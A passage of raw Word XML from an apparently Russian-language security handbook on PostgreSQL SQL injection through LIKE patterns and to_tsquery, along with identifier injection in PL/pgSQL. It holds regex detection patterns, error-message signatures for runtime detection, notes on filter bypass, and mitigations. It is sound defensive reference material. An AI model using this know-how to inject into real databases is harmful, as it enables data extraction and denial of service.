        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bI?LIKE\s+['\"]%\{", re.IGNORECASE),                   # LIKE '%{var}%'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3.15.2: to_tsquery с user-input (требует review)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\([^)]*:\w+\)", re.IGNORECASE),          # to_tsquery(:var)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\([^)]*,\s*:\w+\)", re.IGNORECASE),      # to_tsquery('lang', :var)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3.15.4: concat в аргументах to_tsquery — критично</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\([^)]*\|\|", re.IGNORECASE),            # to_tsquery(... || ...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\(\s*f['\"]", re.IGNORECASE),            # to_tsquery(f"...")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3.15.4: f-string в SQL вокруг to_tsquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"text\s*\(\s*f['\"][^'\"]*to_tsquery", re.IGNORECASE),</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PATTERN_INJECTION_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: PG-сторона</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "syntax error in tsquery: \"",                          # 3.15.4 leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "text search configuration \"[^\"]+\" does not exist",  # 3.15.4 Variant B leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "canceling statement due to statement timeout",         # 3.15.1 DoS-индикатор</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Дополнительная рекомендация для rules.py:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Высокий confidence — if `to_tsquery(` найдено в коде, проверить наличие миграции на</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># websearch_to_tsquery или подтверждение server-side-built первого аргумента</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PATTERN_INJECTION_RISK = 6   # medium-high — leak без RCE, но direct extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти patterns ловят statically-detectable варианты на code-review. Runtime-signal через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax error in tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns для production-детекции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перекрёстные ссылки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LIKE-bypass (3.15.1) может комбинироваться с UNION через дополнительные точки входа.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3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.15.4 — параллельный класс error-каналов; tsquery error message — конкретный source.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3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.15.1 (position-matching) и 3.15.2 (boolean override) создают boolean-каналы.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Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.15.1 (DoS-DDoS) может перейти в time-channel при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 в subquery.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концепция 3.15.4 эскалирует в stacked, если concat выходит из tsquery-arg в SQL-body.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 Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — LIKE и tsquery operators обычно проходят WAF, который смотрит на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/keywords.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 в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс semantic-injection на серверной стороне.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5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая защита; 3.15 показывает её </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ограничения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bind не закрывает pattern-семантику).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5.5 Конфиги PostgreSQL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log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обнаруживает 3.15.4 leakage.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 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — escape-helpers (3.15.1), Literal/whitelist (3.15.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре подраздела 3.15 — application-level или ввод-зависимые, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без specific provider behavior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AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: одинаковое поведение со self-hosted. Для 3.15.1 DoS-mitigation —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через parameter group;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extension доступен. Для FTS —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идентичны.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Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: то же;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через flag,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доступен.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Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PostgREST умеет фильтровать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?title=fts.admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); если приложение использует PostgREST RPC, тот </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже передаёт user-input в `to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наследует уязвимость 3.15.2/3.15.4. Recommendation: использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgREST с phrase-mode (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?title=phfts.term</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), что соответствует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phraseto_tsquery</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Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: то же поведение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ограничен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для DoS защиты 3.15.1. Логирование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax error in tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступно в Cloud SQL Logs / RDS Performance Insights и может использоваться для runtime-детекции 3.15.4. Принципиальной защиты на уровне provider — нет, всё application-level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — класс уязвимостей, специфичный для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">серверного кода на PL/pgSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (functions, procedures, triggers), где dynamic SQL строится через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 конкатенацией identifier-имён (таблиц, колонок, схем). PostgreSQL Wire Protocol bind-параметры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не работают для identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.14.2 application-side analog) — единственный путь подставить имя таблицы или колонки в dynamic SQL это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">текстовая подстановка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Какой инструмент использовать — определяет, есть ли уязвимость:</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`format('%I', ident)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — identifier quoting с doubling двойных кавычек. Безопасно для имён.</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`quote_ident(ident)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функциональный эквивалент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стилистически старее.</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`format('%L', value)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`quote_literal(value)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для значений в text-form (когда EXECUTE USING нельзя).</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`EXECUTE ... USING $1`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bind-параметризация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">для значений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
